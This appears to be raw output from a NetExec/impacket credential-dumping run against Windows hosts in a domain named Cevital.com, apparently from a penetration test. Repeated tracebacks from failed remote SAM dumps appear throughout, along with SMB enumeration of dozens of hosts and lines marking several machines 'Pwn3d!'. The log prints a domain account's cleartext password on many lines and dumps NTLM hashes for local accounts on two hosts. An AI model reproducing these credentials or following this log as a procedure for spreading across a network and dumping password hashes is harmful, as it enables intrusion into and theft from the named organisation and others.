│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.174.61 445 OXOLT020067 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.58 445 OXODT02020002
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.174.86 445 OXODT020017 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.58 445 OXODT02020002
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.174.58 445 OXODT02020002
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.174.58 445 OXODT02020002
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b0a696fac99e911923fbc419c6c
5f297:::
SMB 10.34.174.58 445 OXODT02020002 [+] Added 4 SAM hashes to the
database
[03:25:49] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.174.61 445 OXOLT020067 [*] Dumping SAM hashes


SMB 10.34.174.61 445 OXOLT020067
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.174.61 445 OXOLT020067
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[03:25:50] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.174.61 445 OXOLT020067


DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.174.61 445 OXOLT020067
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.174.61 445 OXOLT020067 [+] Added 4 SAM hashes to the
database
SMB 10.34.193.35 445 NONE [*] OS 1.00 (name:) (domain:)
(signing:False) (SMBv1:True)
SMB 10.34.193.35 445 NONE [+] \oxxo_pentest:p8Z49-#MX6?
ki@ (Guest)
SMB 10.34.193.37 445 OXOLT020077 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXOLT020077) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.193.38 445 OXODT031611 [*] Windows 11 Build 22621 x64
(name:OXODT031611) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.193.39 445 OXOLT020029 [*] Windows 10.0 Build 26100
x64 (name:OXOLT020029) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.193.37 445 OXOLT020077 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.193.38 445 OXODT031611 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.193.39 445 OXOLT020029 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:26:44] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

[03:26:45] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.194.66 445 OXOLT020084 [*] Windows 11 Build 22621 x64


(name:OXOLT020084) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.67 445 OXOLT020075 [*] Windows 11 Build 22621 x64
(name:OXOLT020075) (domain:Cevital.com) (signing:True) (SMBv1:False)
[03:26:46] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.194.68 445 OXOLT020002 [*] Windows 11 Build 22621 x64


(name:OXOLT020002) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.69 445 OXOLT020001 [*] Windows 11 Build 22621 x64
(name:OXOLT020001) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.66 445 OXOLT020084 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.194.141 445 OXODT031521 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT031521) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.146 445 OXODT033421 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT033421) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.142 445 OXODT030611 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT030611) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.133 445 OXODT031531 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT031531) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.134 445 OXODT031811 [*] Windows 11 Build 22621 x64
(name:OXODT031811) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.140 445 OXODT031941 [*] Windows 11 Build 22621 x64
(name:OXODT031941) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.130 445 OXODT0316131 [*] Windows 11 Build 22621 x64
(name:OXODT0316131) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.132 445 OXODT033511 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT033511) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.135 445 OXODT033911 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT033911) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.154 445 OXODT032611 [*] Windows 11 Build 22621 x64
(name:OXODT032611) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.147 445 OXODT031011 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT031011) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.136 445 OXFDT030003 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXFDT030003) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.160 445 OXODT030911 [*] Windows 11 Build 22621 x64
(name:OXODT030911) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.139 445 OXODT030621 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT030621) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.144 445 OXODT031931 [*] Windows 11 Build 22621 x64
(name:OXODT031931) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.131 445 OXODT030921 [*] Windows 11 Build 22621 x64
(name:OXODT030921) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.158 445 OXODT032711 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT032711) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.143 445 OXODT031511 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT031511) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.149 445 OXFLT030014 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXFLT030014) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.129 445 OXODT033021 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT033021) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.138 445 OXODT031911 [*] Windows 11 Build 22621 x64
(name:OXODT031911) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.155 445 OXODT030411 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT030411) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.163 445 OXODT034111 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT034111) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.137 445 OXODT030711 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT030711) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.164 445 OXODT031641 [*] Windows 11 Build 22621 x64
(name:OXODT031641) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.157 445 OXODT031711 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT031711) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.151 445 OXODT031821 [*] Windows 11 Build 22621 x64
(name:OXODT031821) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.162 445 OXODT0316121 [*] Windows 11 Build 22621 x64
(name:OXODT0316121) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.148 445 OXODT031691 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT031691) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.177 445 OXFLT030010 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXFLT030010) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.152 445 OXFLT030009 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXFLT030009) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.170 445 OXODT031671 [*] Windows 11 Build 22621 x64
(name:OXODT031671) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.161 445 OXFLT030016 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXFLT030016) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.179 445 OXODT034611 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT034611) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.174 445 OXODT034811 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT034811) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.150 445 OXODT031411 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT031411) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.178 445 OXODT032521 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT032521) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.165 445 OXODT032311 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT032311) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.166 445 OXODT030311 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT030311) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.175 445 OXODT034821 [*] Windows 11 Build 22621 x64
(name:OXODT034821) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.171 445 OXODT0316101 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT0316101) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.173 445 OXODT031311 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT031311) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.169 445 OXODT032511 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT032511) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.176 445 OXODT031661 [*] Windows 11 Build 22621 x64
(name:OXODT031661) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.181 445 OXFLT030013 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXFLT030013) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.168 445 OXODT032211 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT032211) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.167 445 OXODT034211 [*] Windows 11 Build 22621 x64
(name:OXODT034211) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.180 445 OXODT030211 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT030211) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.145 445 OXODT033431 [*] Windows 11 Build 22621 x64
(name:OXODT033431) (domain:Cevital.com) (signing:True) (SMBv1:False)
[03:26:49] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.194.67 445 OXOLT020075 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.194.68 445 OXOLT020002 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.194.159 445 OXODT032811 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT032811) (domain:Cevital.com) (signing:True)
(SMBv1:False)
[03:26:53] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




